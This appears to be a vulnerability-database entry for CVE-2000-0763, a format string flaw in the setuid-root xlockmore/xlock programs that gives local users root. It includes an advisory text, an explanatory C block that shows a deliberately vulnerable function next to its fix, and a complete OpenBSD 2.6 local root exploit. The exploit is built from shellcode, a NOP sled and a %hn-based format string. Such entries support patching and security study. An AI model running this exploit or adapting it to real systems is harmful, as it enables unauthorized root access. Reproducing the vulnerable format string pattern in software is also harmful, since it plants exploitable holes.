xlockmore and xlockf format string vulnerability

Vulnerability ID 1105964   Type Format string
Published 2000-08-15   Updated 2005-05-02
CVE ID CVE-2000-0763
CNNVD-ID CNNVD-200010-075
Platform Unix   CVSS score 7.2
|Sources
https://www.exploit-db.com/exploits/20153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-075
|Details
xlockmore and xlockf do not properly sanitize user-supplied format strings. A local user can gain root privileges via the -d option.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/1585/info

A vulnerability exists in versions of the xlockmore program, originally written by David Bagley. It is believed to affect all versions of xlock derived from xlockmore, including the xlock shipped with a number of popular operating systems.

Xlock is installed setuid root. Normally, the -d (-display) option to xlock names the display it will lock. The value is of the form hostname:displaynumber, e.g. x.host.com:0, which connects to the X server running on x.host.com and listening on TCP port 6000 (6000 plus the display number). xlock hands this value to a printf-style error() routine as the format string rather than as an argument, so conversions embedded in it are interpreted. Supplying %x conversions makes xlock print words from its own stack; %n conversions write the number of characters output so far to an address taken from the stack, so an attacker who places chosen addresses in the string can overwrite values on the stack. This may make it possible to execute arbitrary code with root privileges.

While several vulnerable operating systems have been listed, this list is by no means complete.

It has been reported that this vulnerability exists only on systems whose xlock uses the error() call. It is also unverified whether the underlying bug is in libc or in Xlib.
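The mechanism described above, as an added example that is not part of the original advisory or of xlockmore's own code: a hypothetical variadic report() stands in for xlock's error(), called once with the -d value as its format (the bug) and once with the value passed as a %s argument (the fix); a check that rejects any -d value containing a conversion; and a demonstration of the two-part %hn write that the exploit below relies on, done with real pointer arguments so that it is well-defined C rather than reading pointers from the stack. All function names are assumptions, and write_u32_via_hn() assumes a little-endian host.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for xlock's error(): a variadic reporter that
 * renders fmt into out and returns the length vsnprintf reports. */
static int report(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return n;
}

/* The bug class: the attacker-controlled -d value *is* the format string,
 * so "%x" in it dumps stack words and "%n" writes through stack words.
 * Deliberately vulnerable; do not copy. */
int report_display_vuln(char *out, size_t outlen, const char *display)
{
    return report(out, outlen, display);
}

/* The fix: the user string is an argument, never the format. */
int report_display_safe(char *out, size_t outlen, const char *display)
{
    return report(out, outlen, "%s", display);
}

/* Count '%' conversions in a user string ("%%" is a literal and does not
 * count).  A non-zero result means the string must never reach a format
 * slot; a validating caller would reject it outright. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* The write primitive the exploit builds: two %hn directives store one
 * 32-bit value into a 32-bit slot as two 16-bit halves.  %n only counts
 * upward, so the smaller half is written first and the second width is
 * the difference; %hn truncates the running count to 16 bits.  Here the
 * two targets are genuine pointer arguments; in the attack, error() pulls
 * them from stack words the attacker placed at the start of the -d value.
 * Assumes a little-endian host (u16[0] is the low half). */
uint32_t write_u32_via_hn(uint32_t value)
{
    union { uint32_t u32; uint16_t u16[2]; } slot = { 0 };
    unsigned lo_half = value & 0xffffu, hi_half = value >> 16;
    unsigned first = lo_half, second = hi_half;
    short *first_ptr = (short *)&slot.u16[0];
    short *second_ptr = (short *)&slot.u16[1];

    if (first > second) {               /* write the smaller half first */
        first = hi_half;
        second = lo_half;
        first_ptr = (short *)&slot.u16[1];
        second_ptr = (short *)&slot.u16[0];
    }

    size_t cap = 1u << 17;              /* room for up to 65535 pad bytes */
    char *buf = malloc(cap);
    if (!buf)
        return 0;
    /* "%*s" with "" emits exactly `width` spaces, so the count each %hn
     * stores is the intended 16-bit half. */
    snprintf(buf, cap, "%*s%hn%*s%hn",
             (int)first, "", first_ptr,
             (int)(second - first), "", second_ptr);
    free(buf);
    return slot.u32;
}
```

The exploit below does the same arithmetic by hand: it splits shell_addr into two halves, orders them, subtracts the bytes already emitted by the %8x pops (len), and lets unsigned short wrap-around supply the modulo-2^16 adjustment that %hn's truncation expects.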


/*
OpenBSD 2.6/2.7 xlock exploit by noir
[email protected]

tested only on OpenBSD/i386 2.6

thanks:
[email protected] for support!

greets: caddis <[email protected]> original chpass exploit
        bind, CronoS, dustdvl, ppl from defcon7, gsu-linux staff
        TESO, ADM, Lam3rz, SSG
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


/* OpenBSD/i386 shellcode: setuid(0); setgid(0); execve("/bin/sh", ...) */
char bsd_shellcode[] =
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"   /* setuid(0) */
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"   /* setgid(0) */
"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
"\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
"\x50\x51\x56\x50\xb0\x3b\xcd\x80"   /* execve("/bin/sh", argv, NULL) */
"\xe8\xe5\xff\xff\xff/bin/sh";

struct platform {
    char *name;
    unsigned short count;       /* how many %8x pops reach the addresses at the start of fmt_string */
    unsigned long dest_addr;    /* address overwritten by the two %hn writes */
    unsigned long shell_addr;   /* address of the NOP sled placed in the environment */
    char *shellcode;
};

struct platform targets[3] =
{
    { "OpenBSD 2.6 i386       ", 246, 0xdfbfd4a0, 0xdfbfdde0, bsd_shellcode },
    { "OpenBSD 2.7 i386       ", 246, 0xaabbccdd, 0xaabbccdd, bsd_shellcode }, /* placeholders; not filled in by the author */
    { NULL, 0, 0, 0, NULL }
};

char jmpcode[129];        /* NOP sled with the shellcode at its end; the only environment string */
char fmt_string[2000];    /* the -display value: addresses, %8x pops, then the two %hn writes */

char *args[] = { "xlock", "-display", fmt_string, NULL };
char *envs[] = { jmpcode, NULL };


int main(int argc, char *argv[])
{
    char *p;
    int x, len = 0;
    struct platform *target;
    unsigned short low, high;
    unsigned long shell_addr[2], dest_addr[2];

    (void)argc;
    (void)argv;

    target = &targets[0];

    /* build the NOP sled and append the shellcode */
    memset(jmpcode, 0x90, sizeof(jmpcode));
    strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode), target->shellcode);

    /* split the shellcode address into two 16-bit halves, one per %hn */
    shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16;
    shell_addr[1] =  target->shell_addr & 0xffff;

    memset(fmt_string, 0x00, sizeof(fmt_string));

    /* %8x pops walk printf's argument pointer up the stack until it reaches
       the addresses stored at the start of fmt_string; len tracks the bytes
       those pops print, since %n counts them */
    for (x = 17; x < target->count; x++) {
        strcat(fmt_string, "%8x");
        len += 8;
    }

    /* %n only counts upward, so the smaller half is written first; the
       unsigned short arithmetic wraps modulo 2^16, matching %hn's truncation */
    if (shell_addr[1] > shell_addr[0]) {
        dest_addr[0] = target->dest_addr+2;
        dest_addr[1] = target->dest_addr;
        low  = shell_addr[0] - len;
        high = shell_addr[1] - low - len;
    } else {
        dest_addr[0] = target->dest_addr;
        dest_addr[1] = target->dest_addr+2;
        low  = shell_addr[1] - len;
        high = shell_addr[0] - low - len;
    }

    /* first 17 bytes of the -display value: a pad byte, then filler/address
       pairs; the two addresses are what the %hn writes dereference
       (assumes 32-bit long, i.e. i386) */
    *(long *)&fmt_string[0] =  0x41;
    *(long *)&fmt_string[1]  = 0x11111111;
    *(long *)&fmt_string[5]  = dest_addr[0];
    *(long *)&fmt_string[9]  = 0x11111111;
    *(long *)&fmt_string[13] = dest_addr[1];

    /* append "%<low>d%hn%<high>d%hn": each %<n>d pads the output to the
       desired count before the following %hn stores it */
    p = fmt_string + strlen(fmt_string);
    sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high);

    execve("/usr/X11R6/bin/xlock", args, envs);
    perror("execve");
    return 1;
}
|References

Source: BUGTRAQ
Name: 20000816 xlock vulnerability
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: BID
Name: 1585
Link: http://www.securityfocus.com/bid/1585
Source: DEBIAN
Name: 20000816 xlockmore: possible shadow file compromise
Link: http://www.debian.org/security/2000/20000816
Source: FREEBSD
Name: FreeBSD-SA-00:44.xlockmore
Link: http://archives.neohapsis.com/archives/freebsd/2000-08/0340.html
Source: BUGTRAQ
Name: 20000823 MDKSA-2000:038 - xlockmore update
Link: http://archives.neohapsis.com/archives/bugtraq/2000-08/0294.html
Source: BUGTRAQ
Name: 20000817 Conectiva Linux Security Announcement - xlockmore
Link: http://archives.neohapsis.com/archives/bugtraq/2000-08/0212.html
